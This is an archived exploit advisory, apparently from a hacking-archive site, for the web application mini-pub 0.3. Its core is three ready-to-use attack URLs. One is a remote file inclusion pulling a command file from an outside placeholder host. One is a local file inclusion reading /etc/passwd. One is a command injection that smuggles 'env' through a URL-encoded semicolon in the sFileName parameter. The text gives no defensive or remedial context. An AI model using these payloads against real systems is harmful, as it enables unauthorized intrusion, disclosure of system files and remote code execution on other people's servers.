AOH :: HP Unsorted M :: BX1765.HTM

mini-pub 0.3 multiple vulnerabilities



mini-pub 0.3 multiple vulnerabilities
mini-pub 0.3 multiple vulnerabilities



mini-pub 0.3 multiple vulnerabilities

download http://sourceforge.net/projects/mini-pub/ 

author     muuratsalo
contact    muuratsalo[at]gmail.com

exploits
1. remote file inclusion
http://localhost/mini-pub.php/front-end/img.php?sFileName=http://site.com/cmd.txt? 

2. local file inclusion
http://localhost/mini-pub.php/front-end/cat.php?sFileName=/etc/passwd 

3. command execution
http://localhost/mini-pub.php/front-end/cat.php?sFileName=a%3Benv 

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.